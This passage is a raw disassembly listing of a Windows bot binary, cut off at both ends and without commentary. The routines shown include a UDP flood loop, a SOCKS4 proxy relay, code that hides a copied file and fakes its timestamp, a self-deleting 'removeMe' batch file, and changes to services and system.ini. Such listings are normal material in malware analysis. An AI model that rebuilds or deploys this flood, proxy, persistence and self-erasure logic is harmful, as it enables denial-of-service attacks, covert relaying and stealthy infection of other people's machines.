push offset aSErrorSendin_0 ; "%s Error sending to %s."
push eax
push edi
call sub_4104F6
add esp, 10h
loc_41EAF1: ; CODE XREF: sub_41EA1B+B8�j
push [ebp+var_30]
call sub_41C059
pop ecx
push 1
call dword_42F150 ; ExitThread
loc_41EB02: ; CODE XREF: sub_41EA1B+B3�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_41EB0C
; ---------------------------------------------------------------------------
loc_41EB09: ; CODE XREF: sub_41EA1B+A2�j
lea eax, [ebp+var_4]
loc_41EB0C: ; CODE XREF: sub_41EA1B+EC�j
mov eax, [eax]
cmp [ebp+var_34], ebx
mov [ebp+var_14], eax
mov esi, 0FFFFh
jnz short loc_41EB29
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
inc edx
push edx
jmp short loc_41EB2C
; ---------------------------------------------------------------------------
loc_41EB29: ; CODE XREF: sub_41EA1B+FE�j
push [ebp+var_34]
loc_41EB2C: ; CODE XREF: sub_41EA1B+10C�j
call dword_454314 ; ntohs
mov [ebp+var_16], ax
xor eax, eax
inc eax
cmp [ebp+var_34], eax
jge short loc_41EB41
mov [ebp+var_34], eax
loc_41EB41: ; CODE XREF: sub_41EA1B+121�j
cmp [ebp+var_34], esi
jle short loc_41EB49
mov [ebp+var_34], esi
loc_41EB49: ; CODE XREF: sub_41EA1B+129�j
mov eax, [ebp+var_40]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_38], ebx
mov [ebp+var_40], eax
jnz short loc_41EB61
mov [ebp+var_38], 5
loc_41EB61: ; CODE XREF: sub_41EA1B+13D�j
xor esi, esi
cmp [ebp+var_3C], ebx
jle short loc_41EBCA
loc_41EB68: ; CODE XREF: sub_41EA1B+165�j
call sub_4220FC
cdq
mov ecx, 0F0h
idiv ecx
inc esi
cmp esi, [ebp+var_3C]
mov [ebp+esi-10145h], dl
jl short loc_41EB68
jmp short loc_41EBCA
; ---------------------------------------------------------------------------
loc_41EB84: ; CODE XREF: sub_41EA1B+1B2�j
dec [ebp+var_40]
call sub_4220FC
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_41EBCF
loc_41EB93: ; CODE XREF: sub_41EA1B+1AD�j
lea eax, [ebp+var_18]
push 10h
push eax
push ebx
call sub_4220FC
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_3C]
sub eax, edx
push eax
lea eax, [ebp+var_10144]
push eax
push [ebp+var_8]
call dword_454370 ; sendto
push [ebp+var_38]
call dword_42F15C ; Sleep
inc esi
cmp esi, [ebp+var_40]
jl short loc_41EB93
loc_41EBCA: ; CODE XREF: sub_41EA1B+14B�j
; sub_41EA1B+167�j
cmp [ebp+var_40], ebx
jg short loc_41EB84
loc_41EBCF: ; CODE XREF: sub_41EA1B+176�j
dec [ebp+var_40]
cmp [ebp+var_28], ebx
mov edi, offset a75bqq0i7ucw0 ; "75bQQ0i7ucW0"
mov esi, offset aSDoneToS ; "%s done to %s"
jnz short loc_41EC01
cmp [ebp+var_2C], ebx
jnz short loc_41EC06
lea eax, [ebp+var_C0]
push eax
push edi
lea eax, [ebp+var_140]
push esi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 14h
loc_41EC01: ; CODE XREF: sub_41EA1B+1C4�j
cmp [ebp+var_2C], ebx
jz short loc_41EC21
loc_41EC06: ; CODE XREF: sub_41EA1B+1C9�j
lea eax, [ebp+var_C0]
push eax
push edi
lea eax, [ebp+var_140]
push esi
push eax
push [ebp+arg_0]
call sub_410491
add esp, 14h
loc_41EC21: ; CODE XREF: sub_41EA1B+1E9�j
push [ebp+var_30]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
sub_41EA1B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EC31 proc near ; CODE XREF: sub_41ED27+125�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_41EC47: ; CODE XREF: sub_41EC31+BB�j
; sub_41EC31+EB�j
xor ecx, ecx
mov [ebp+var_100], ebx
inc ecx
xor eax, eax
mov [ebp+var_104], ecx
loc_41EC58: ; CODE XREF: sub_41EC31+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_41EC69
inc eax
cmp eax, ecx
jb short loc_41EC58
loc_41EC69: ; CODE XREF: sub_41EC31+31�j
cmp eax, ecx
jnz short loc_41EC7A
mov [ebp+eax*4+var_100], edx
inc [ebp+var_104]
loc_41EC7A: ; CODE XREF: sub_41EC31+3A�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_4542FC ; select
lea eax, [ebp+var_104]
push eax
push ebx
call dword_4541E4 ; __WSAFDIsSet
test eax, eax
jz short loc_41ECDA
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call dword_454330 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_41ED22
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_454350 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41ED22
loc_41ECDA: ; CODE XREF: sub_41EC31+7B�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_4541E4 ; __WSAFDIsSet
test eax, eax
jz loc_41EC47
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call dword_454330 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_41ED22
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call dword_454350 ; send
cmp eax, 0FFFFFFFFh
jnz loc_41EC47
loc_41ED22: ; CODE XREF: sub_41EC31+90�j
; sub_41EC31+A7�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41EC31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED27 proc near ; DATA XREF: sub_41EE55+A4�o
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_420 = byte ptr -420h
var_41F = byte ptr -41Fh
var_41E = word ptr -41Eh
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 524h
push ebx
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
push edi
xor ebx, ebx
push eax
xor edi, edi
push ebx
lea eax, [ebp+var_524]
push ebx
inc edi
push eax
push ebx
mov [ebp+var_8], 5
mov [ebp+var_4], ebx
mov [ebp+var_520], esi
mov [ebp+var_524], edi
call dword_4542FC ; select
test eax, eax
jz loc_41EE1A
push ebx
lea eax, [ebp+var_420]
push 408h
push eax
push esi
call dword_454330 ; recv
test eax, eax
jle loc_41EE1A
cmp [ebp+var_420], 4
jnz loc_41EE1A
cmp [ebp+var_41F], 1
jnz short loc_41EE1A
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_4221F0
mov ax, [ebp+var_41E]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_41C]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_454394 ; socket
mov edi, eax
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_4542AC ; connect
cmp eax, 0FFFFFFFFh
push 400h
lea eax, [ebp+var_418]
push ebx
mov [ebp+var_420], bl
push eax
jnz short loc_41EE2A
mov [ebp+var_41F], 5Bh
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_420]
push ebx
push 8
push eax
push esi
call dword_454350 ; send
loc_41EE1A: ; CODE XREF: sub_41ED27+40�j
; sub_41ED27+5C�j ...
push esi
call dword_4543AC ; closesocket
loc_41EE21: ; CODE XREF: sub_41ED27+12C�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41EE2A: ; CODE XREF: sub_41ED27+D1�j
mov [ebp+var_41F], 5Ah
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_420]
push ebx
push 8
push eax
push esi
call dword_454350 ; send
push esi
push edi
call sub_41EC31
pop ecx
pop ecx
jmp short loc_41EE21
sub_41ED27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41EE55 proc near ; DATA XREF: sub_403B2C+12CD�o
var_260 = byte ptr -260h
var_1DC = dword ptr -1DCh
var_1C0 = dword ptr -1C0h
var_20 = byte ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 260h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 90h
mov esi, eax
lea edi, [ebp+var_260]
rep movsd
push [ebp+var_1C0]
xor edi, edi
inc edi
mov [ebp+var_10], 2
mov [eax+0BCh], edi
call dword_454314 ; ntohs
push 6
xor esi, esi
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
call dword_454394 ; socket
mov edi, eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_454344 ; bind
test eax, eax
jz short loc_41EEC7
push [ebp+var_1DC]
call sub_41C059
pop ecx
push esi
call dword_42F150 ; ExitThread
loc_41EEC7: ; CODE XREF: sub_41EE55+5D�j
push 0Ah
push edi
call dword_454340 ; listen
test eax, eax
jz short loc_41EEE7
push [ebp+var_1DC]
call sub_41C059
pop ecx
push esi
call dword_42F150 ; ExitThread
loc_41EEE7: ; CODE XREF: sub_41EE55+7D�j
; sub_41EE55+B1�j
lea eax, [ebp+var_20]
push esi
push eax
push edi
call dword_4543A4 ; accept
lea ecx, [ebp+arg_0]
push ecx
push esi
push eax
push offset sub_41ED27
push esi
push esi
call dword_42F158 ; CreateThread
jmp short loc_41EEE7
sub_41EE55 endp
; =============== S U B R O U T I N E =======================================
sub_41EF08 proc near ; CODE XREF: sub_403A63+47�p
; sub_4140F8+F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, offset asc_433F94 ; " "
push edi
push esi
push [esp+10h+arg_4]
call sub_422248
mov edi, [esp+14h+arg_0]
xor ebx, ebx
inc ebx
pop ecx
cmp [esp+10h+arg_8], ebx
pop ecx
mov [edi], eax
jle short loc_41EF43
loc_41EF2B: ; CODE XREF: sub_41EF08+39�j
push esi
push 0
call sub_422248
pop ecx
mov [edi+ebx*4], eax
test eax, eax
pop ecx
jz short loc_41EF43
inc ebx
cmp ebx, [esp+0Ch+arg_8]
jl short loc_41EF2B
loc_41EF43: ; CODE XREF: sub_41EF08+21�j
; sub_41EF08+32�j
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41EF08 endp
; =============== S U B R O U T I N E =======================================
sub_41EF49 proc near ; CODE XREF: sub_412267+97�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_42F0A0 ; GetFileAttributesA
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_41EF49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EF5E proc near ; CODE XREF: sub_41F01F+EF�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
push edi
lea eax, [ebp+var_110]
push 104h
push eax
call dword_42F0C0 ; GetWindowsDirectoryA
push 1
push offset aShell_0 ; "Shell"
push offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push 80000002h
call sub_41A829
xor ebx, ebx
add esp, 10h
cmp eax, ebx
jz short loc_41F018
push eax
lea eax, [ebp+var_110]
push eax
call dword_42F0D4 ; lstrcatA
mov esi, dword_42F060
mov edi, 80h
push ebx
push edi
push 3
push ebx
push 1
lea eax, [ebp+var_110]
push 80000000h
push eax
call esi ; dword_42F060
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz short loc_41F018
lea ecx, [ebp+var_C]
push ecx
push ebx
push ebx
push eax
call dword_42F11C ; GetFileTime
push [ebp+var_4]
call dword_42F038 ; CloseHandle
push ebx
push edi
push 3
push ebx
push 2
push 40000000h
push [ebp+arg_0]
call esi ; dword_42F060
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41F018
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
push esi
call dword_42F118 ; SetFileTime
push esi
call dword_42F038 ; CloseHandle
xor eax, eax
inc eax
jmp short loc_41F01A
; ---------------------------------------------------------------------------
loc_41F018: ; CODE XREF: sub_41EF5E+3B�j
; sub_41EF5E+71�j ...
xor eax, eax
loc_41F01A: ; CODE XREF: sub_41EF5E+B8�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EF5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F01F proc near ; CODE XREF: sub_4120E9+F0�p
; sub_41B69D+99�p
var_30C = byte ptr -30Ch
var_208 = byte ptr -208h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30Ch
push ebx
push esi
mov esi, 104h
lea eax, [ebp+var_208]
push esi
xor ebx, ebx
push eax
push ebx
call dword_42F074 ; GetModuleHandleA
push eax
call dword_42F154 ; GetModuleFileNameA
push [ebp+arg_4]
lea eax, [ebp+var_104]
push [ebp+arg_0]
push offset dword_43C270
push esi
push eax
call sub_42219B
add esp, 14h
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_30C]
push eax
call dword_42F04C ; lstrcpyA
lea eax, [ebp+var_30C]
push eax
call dword_45429C ; PathRemoveFileSpecA
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_208]
push eax
call dword_42F070 ; lstrcmpiA
test eax, eax
jz loc_41F12D
lea eax, [ebp+var_104]
push eax
call dword_42F0A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_41F0C3
lea eax, [ebp+var_104]
push 80h
push eax
call dword_42F08C ; SetFileAttributesA
loc_41F0C3: ; CODE XREF: sub_41F01F+90�j
mov esi, dword_42F09C
push edi
push ebx
jmp short loc_41F0F1
; ---------------------------------------------------------------------------
loc_41F0CD: ; CODE XREF: sub_41F01F+E6�j
call dword_42F068 ; RtlGetLastWin32Error
test ebx, ebx
jnz short loc_41F107
cmp eax, 20h
jz short loc_41F0E1
cmp eax, 5
jnz short loc_41F107
loc_41F0E1: ; CODE XREF: sub_41F01F+BB�j
xor ebx, ebx
push 3A98h
inc ebx
call dword_42F15C ; Sleep
push 0
loc_41F0F1: ; CODE XREF: sub_41F01F+AC�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_208]
push eax
call esi ; dword_42F09C
mov edi, eax
test edi, edi
jz short loc_41F0CD
loc_41F107: ; CODE XREF: sub_41F01F+B6�j
; sub_41F01F+C0�j
lea eax, [ebp+var_104]
push eax
call sub_41EF5E
pop ecx
lea eax, [ebp+var_104]
push 7
push eax
call dword_42F08C ; SetFileAttributesA
test edi, edi
pop edi
jz short loc_41F12D
xor eax, eax
inc eax
jmp short loc_41F12F
; ---------------------------------------------------------------------------
loc_41F12D: ; CODE XREF: sub_41F01F+7A�j
; sub_41F01F+107�j
xor eax, eax
loc_41F12F: ; CODE XREF: sub_41F01F+10C�j
pop esi
pop ebx
leave
retn
sub_41F01F endp
; =============== S U B R O U T I N E =======================================
sub_41F133 proc near ; CODE XREF: sub_419F6A+B5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 40h
mov edx, offset dword_630E70
pop ecx
xor eax, eax
mov edi, edx
rep stosd
mov eax, [esp+4+arg_4]
pop edi
cmp eax, [esp+arg_8]
jg short loc_41F164
push esi
mov esi, edx
sub esi, eax
loc_41F152: ; CODE XREF: sub_41F133+2E�j
mov ecx, [esp+4+arg_0]
mov cl, [eax+ecx]
mov [esi+eax], cl
inc eax
cmp eax, [esp+4+arg_8]
jle short loc_41F152
pop esi
loc_41F164: ; CODE XREF: sub_41F133+18�j
mov eax, edx
retn
sub_41F133 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F167 proc near ; CODE XREF: sub_403B2C+6FF�p
; sub_403B2C+71C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_41F1F4
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_41F1F4
cmp [ebp+arg_8], esi
jz short loc_41F1F4
cmp byte ptr [eax], 0
jz short loc_41F1F4
push ebx
push edi
call sub_42EBAE
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_41F1EF
push [ebp+arg_4]
push edi
call sub_4235C0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_41F1E8
sub eax, edi
push eax
push edi
push ebx
call sub_4222F0
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_422120
push eax
push [ebp+arg_8]
push ebx
call sub_421F40
push [ebp+arg_4]
call sub_422120
add esp, 20h
add eax, esi
push eax
push ebx
call dword_42F0D4 ; lstrcatA
push ebx
push edi
call dword_42F04C ; lstrcpyA
mov esi, edi
loc_41F1E8: ; CODE XREF: sub_41F167+3C�j
push ebx
call sub_4230B3
pop ecx
loc_41F1EF: ; CODE XREF: sub_41F167+2B�j
mov eax, esi
pop ebx
jmp short loc_41F1F6
; ---------------------------------------------------------------------------
loc_41F1F4: ; CODE XREF: sub_41F167+C�j
; sub_41F167+13�j ...
xor eax, eax
loc_41F1F6: ; CODE XREF: sub_41F167+8B�j
pop edi
pop esi
pop ebp
retn
sub_41F167 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F1FA proc near ; CODE XREF: sub_41F2BB+38�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
xor ebx, ebx
jmp short loc_41F22A
; ---------------------------------------------------------------------------
loc_41F214: ; CODE XREF: sub_41F1FA+36�j
mov dl, [eax]
cmp dl, 3Fh
jz short loc_41F225
cmp dl, 2Ah
jnz short loc_41F237
cmp dl, 3Fh
jnz short loc_41F228
loc_41F225: ; CODE XREF: sub_41F1FA+1F�j
inc ecx
mov [edi], ecx
loc_41F228: ; CODE XREF: sub_41F1FA+29�j
inc dword ptr [esi]
loc_41F22A: ; CODE XREF: sub_41F1FA+18�j
mov ecx, [edi]
mov eax, [esi]
cmp [ecx], bl
jnz short loc_41F214
jmp short loc_41F237
; ---------------------------------------------------------------------------
loc_41F234: ; CODE XREF: sub_41F1FA+40�j
inc eax
mov [esi], eax
loc_41F237: ; CODE XREF: sub_41F1FA+24�j
; sub_41F1FA+38�j
cmp byte ptr [eax], 2Ah
jz short loc_41F234
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_41F259
cmp [eax], bl
jz short loc_41F24C
xor eax, eax
jmp short loc_41F2B6
; ---------------------------------------------------------------------------
loc_41F24C: ; CODE XREF: sub_41F1FA+4C�j
cmp dl, bl
jnz short loc_41F259
cmp [eax], bl
jnz short loc_41F259
xor eax, eax
inc eax
jmp short loc_41F2B6
; ---------------------------------------------------------------------------
loc_41F259: ; CODE XREF: sub_41F1FA+48�j
; sub_41F1FA+54�j ...
push ecx
push eax
call sub_41F2BB
pop ecx
test eax, eax
pop ecx
jnz short loc_41F2A0
loc_41F266: ; CODE XREF: sub_41F1FA+A4�j
inc dword ptr [edi]
mov eax, [edi]
jmp short loc_41F278
; ---------------------------------------------------------------------------
loc_41F26C: ; CODE XREF: sub_41F1FA+86�j
cmp cl, 5Bh
jz short loc_41F282
cmp dl, bl
jz short loc_41F282
inc eax
mov [edi], eax
loc_41F278: ; CODE XREF: sub_41F1FA+70�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jnz short loc_41F26C
loc_41F282: ; CODE XREF: sub_41F1FA+75�j
; sub_41F1FA+79�j
cmp [eax], bl
jz short loc_41F297
push eax
push dword ptr [esi]
call sub_41F2BB
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_41F29C
; ---------------------------------------------------------------------------
loc_41F297: ; CODE XREF: sub_41F1FA+8A�j
mov [ebp+var_4], ebx
xor eax, eax
loc_41F29C: ; CODE XREF: sub_41F1FA+9B�j
cmp eax, ebx
jnz short loc_41F266
loc_41F2A0: ; CODE XREF: sub_41F1FA+6A�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_41F2B3
mov eax, [esi]
cmp [eax], bl
jnz short loc_41F2B3
mov [ebp+var_4], 1
loc_41F2B3: ; CODE XREF: sub_41F1FA+AA�j
; sub_41F1FA+B0�j
mov eax, [ebp+var_4]
loc_41F2B6: ; CODE XREF: sub_41F1FA+50�j
; sub_41F1FA+5D�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F1FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F2BB proc near ; CODE XREF: sub_4105DF+4C�p
; sub_41066C+4C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_41F302
; ---------------------------------------------------------------------------
loc_41F2C7: ; CODE XREF: sub_41F2BB+4B�j
cmp eax, 1
jnz short loc_41F310
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_41F310
cmp cl, 2Ah
jz short loc_41F2EB
cmp cl, 3Fh
jz short loc_41F2E6
xor eax, eax
cmp cl, dl
setz al
loc_41F2E6: ; CODE XREF: sub_41F2BB+22�j
inc [ebp+arg_4]
jmp short loc_41F2FE
; ---------------------------------------------------------------------------
loc_41F2EB: ; CODE XREF: sub_41F2BB+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_41F1FA
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_41F2FE: ; CODE XREF: sub_41F2BB+2E�j
inc esi
mov [ebp+arg_0], esi
loc_41F302: ; CODE XREF: sub_41F2BB+A�j
mov cl, [esi]
test cl, cl
jnz short loc_41F2C7
jmp short loc_41F310
; ---------------------------------------------------------------------------
loc_41F30A: ; CODE XREF: sub_41F2BB+58�j
cmp eax, 1
jnz short loc_41F32C
inc esi
loc_41F310: ; CODE XREF: sub_41F2BB+F�j
; sub_41F2BB+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_41F30A
cmp eax, 1
jnz short loc_41F32C
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_41F32C
cmp byte ptr [esi], 0
jnz short loc_41F32C
xor eax, eax
inc eax
jmp short loc_41F32E
; ---------------------------------------------------------------------------
loc_41F32C: ; CODE XREF: sub_41F2BB+52�j
; sub_41F2BB+5D�j ...
xor eax, eax
loc_41F32E: ; CODE XREF: sub_41F2BB+6F�j
pop esi
pop ebp
retn
sub_41F2BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F331 proc near ; CODE XREF: sub_4120E9+1B�p
; sub_41F455+D7�p
var_80C = byte ptr -80Ch
var_40C = byte ptr -40Ch
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80Ch
push esi
lea eax, [ebp+var_80C]
push edi
push eax
push 400h
call dword_42F050 ; GetTempPathA
lea eax, [ebp+var_108]
push 104h
xor esi, esi
push eax
push esi
call dword_42F074 ; GetModuleHandleA
push eax
call dword_42F154 ; GetModuleFileNameA
call sub_4220FC
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_4220FC
cdq
idiv edi
lea eax, [ebp+var_80C]
push edx
push eax
lea eax, [ebp+var_20C]
push offset aSRemovemeIIII_ ; "%s\\removeMe%i%i%i%i.bat"
push eax
call sub_422063
add esp, 1Ch
lea eax, [ebp+var_108]
push 80h
push eax
call dword_42F08C ; SetFileAttributesA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_20C]
push 40000000h
push eax
call dword_42F060 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe short loc_41F451
lea eax, [ebp+var_108]
cmp [ebp+arg_0], esi
push eax
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_40C]
jnz short loc_41F409
push offset a@echoOffRepeat ; "@echo off\r\n:Repeat\r\ndel \"%s\">nul\r\nping "...
jmp short loc_41F40E
; ---------------------------------------------------------------------------
loc_41F409: ; CODE XREF: sub_41F331+CF�j
push offset a@echoOffRepe_0 ; "@echo off\r\n:Repeat\r\ndel \"%s\">nul\r\nif ex"...
loc_41F40E: ; CODE XREF: sub_41F331+D6�j
push eax
call sub_422063
add esp, 14h
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_40C]
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_40C]
push eax
push edi
call dword_42F07C ; WriteFile
push edi
call dword_42F038 ; CloseHandle
push esi
push esi
lea eax, [ebp+var_20C]
push esi
push eax
push esi
push esi
call dword_454270 ; ShellExecuteA
loc_41F451: ; CODE XREF: sub_41F331+AF�j
pop edi
pop esi
leave
retn
sub_41F331 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F455 proc near ; CODE XREF: sub_403B2C+838�p
; sub_40CDE2+620�p
var_114 = dword ptr -114h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push offset sub_414F1C
push esi
push esi
call dword_42F158 ; CreateThread
push offset dword_439540
call sub_414F91
mov [esp+114h+var_114], 3E8h
call dword_42F15C ; Sleep
push 0F003Fh
push esi
push esi
call dword_454304 ; OpenSCManagerA
push 0F01FFh
push offset dword_439068
push eax
call dword_4541D4 ; OpenServiceA
push eax
call dword_454250 ; DeleteService
lea eax, [ebp+var_104]
push 104h
push eax
call dword_42F0C0 ; GetWindowsDirectoryA
lea eax, [ebp+var_104]
push offset aSystem_ini ; "\\system.ini"
push eax
call dword_42F0D4 ; lstrcatA
lea eax, [ebp+var_104]
push eax
push offset aExplorer_exe_0 ; "explorer.exe"
push offset aShell ; "shell"
push offset aBoot ; "boot"
call dword_42F160 ; WritePrivateProfileStringA
mov ebx, offset byte_439233
mov edi, offset dword_439134
push ebx
push edi
push dword_439130
call sub_41A454
push ebx
push edi
push 80000001h
call sub_41A454
add esp, 18h
push dword_4555FC
call dword_42F084 ; ReleaseMutex
cmp [ebp+arg_0], esi
jnz short loc_41F532
call sub_41BFDA
push esi
call sub_41F331
pop ecx
loc_41F532: ; CODE XREF: sub_41F455+CF�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F455 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F537 proc near ; CODE XREF: sub_415126+6C�p
; sub_415126+A3�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_630E38
push 0
push edi
call sub_4221F0
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_41F55C: ; CODE XREF: sub_41F537+5B�j
; sub_41F537+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_424A20
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_424AA0
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_41F59A
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_41F55C
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_41F55C
; ---------------------------------------------------------------------------
loc_41F59A: ; CODE XREF: sub_41F537+4B�j
mov eax, edi
jmp short loc_41F5A3
; ---------------------------------------------------------------------------
loc_41F59E: ; CODE XREF: sub_41F537+72�j
mov cl, [esi]
mov [eax], cl
inc eax
loc_41F5A3: ; CODE XREF: sub_41F537+65�j
dec esi
lea ecx, [ebp+var_38]
cmp esi, ecx
jnb short loc_41F59E
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_41F537 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F5B5 proc near ; CODE XREF: sub_4153BB+C2�p
; sub_4153BB+DB�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edi, [ebp+arg_0]
lea esi, [ebp+var_38]
loc_41F5CB: ; CODE XREF: sub_41F5B5+47�j
; sub_41F5B5+4D�j
push 0
push 0Ah
